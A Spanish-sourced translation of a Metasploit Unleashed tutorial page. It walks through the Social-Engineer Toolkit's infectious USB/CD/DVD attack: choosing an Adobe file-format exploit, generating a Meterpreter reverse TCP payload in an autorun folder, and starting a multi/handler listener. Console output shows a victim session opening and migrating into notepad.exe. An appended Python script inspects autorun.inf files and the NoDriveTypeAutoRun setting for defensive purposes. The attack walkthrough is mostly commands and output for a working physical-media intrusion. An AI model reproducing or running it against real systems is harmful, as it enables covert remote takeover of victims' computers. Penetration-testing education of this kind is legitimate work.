Infectious Media Generator
From www.metasploit-es.com.ar
Moving on to physical attack vectors, and a completely different attack method, we will use the Infectious USB/DVD/CD attack vector. This attack vector lets you import your own malicious executable, or one included in Metasploit, to create a DVD/CD/USB that incorporates an autorun.inf file. Once the device is inserted, autorun will be called and the executable will run. New in the most recent version, you can also use file-format exploits: if you are worried that an executable might trigger alerts, you can specify a file-format exploit that will trigger an overflow and compromise the system (for example, an Adobe exploit).
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Third Party Modules
9. Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit
Enter your choice: 3
The Infectious USB/CD/DVD method will create an autorun.inf file and a Metasploit
payload. When the DVD/USB/CD is inserted, it will automatically run if autorun
is enabled.
Pick what type of attack vector you want to use, fileformat bugs or a straight executable.
1. File-Format Exploits
2. Standard Metasploit Executable
Enter your numeric choice (return for default): 1
Enter the IP address for the reverse connection (payload): 172.16.32.129
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)
Enter the number you want (press enter for default): 1
1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/template.pdf directory
[*] Payload generation complete. Press enter to continue.
[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
Do you want to create a listener right now yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
resource (/pentest/exploits/set/src/program_junk/meta_config)> use multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lhost 172.16.32.129
lhost => 172.16.32.129
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lport 443
lport => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
If you do an ls -al in the SET directory you will notice there is an "autorun" directory. Burn the contents of that directory to a CD/DVD or write them to a USB device. Once inserted, you will be presented with a shell.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:42:32 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
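Added example, not part of the original page or of SET: a small defender-side Python script that inspects an autorun.inf of the kind this vector drops on removable media, reports which files its open=/shellexecute= entries would launch, flags lure text that imitates the Windows prompt, and interprets the NoDriveTypeAutoRun registry bitmask that controls whether AutoRun fires at all. The sample autorun.inf contents are constructed for the demonstration; the file names in it are assumptions, not values from the page.

```python
import configparser

# Constructed sample autorun.inf, shaped like what an infectious-media
# "autorun" folder might hold (assumed layout, not copied from the page).
SAMPLE_AUTORUN = """[autorun]
open=program.exe
icon=program.exe
action=Open folder to view files
shellexecute=template.pdf
"""

# Directives through which an autorun.inf can launch a file.
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")
RISKY_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".pdf", ".swf")
# Lure text that mimics the Windows default so a user picks the "open" entry.
LURE_TEXT = "open folder to view files"

# Bits of HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
# NoDriveTypeAutoRun that suppress AutoRun for a given drive type.
DRIVE_REMOVABLE, DRIVE_CDROM = 0x04, 0x20


def parse_autorun(text):
    """Return the [autorun] section as a dict with lowercased keys ({} if absent)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return dict(cp.items("autorun")) if cp.has_section("autorun") else {}


def assess_autorun(text):
    """List what an autorun.inf would launch and why each entry looks suspicious."""
    section = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        target = section.get(key, "").strip().strip('"')
        if not target:
            continue
        name = target.split()[0].lower()  # file name only, arguments ignored
        if name.endswith(RISKY_EXT):
            findings.append(f"{key}= launches '{target}'")
    if section.get("action", "").strip().lower() == LURE_TEXT:
        findings.append("action= mimics the Windows default prompt text")
    return findings


def autorun_suppressed(no_drive_type_autorun, drive_bit):
    """True if the NoDriveTypeAutoRun bitmask disables AutoRun for that drive type."""
    return bool(no_drive_type_autorun & drive_bit)


if __name__ == "__main__":
    for finding in assess_autorun(SAMPLE_AUTORUN):
        print("[!]", finding)
    # 0xFF disables AutoRun on every drive type; 0x91 is the classic default.
    print("removable blocked at 0x91:", autorun_suppressed(0x91, DRIVE_REMOVABLE))
```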
© Offensive Security 2009
Original from www.offensive-security.com. Translated by cbk999.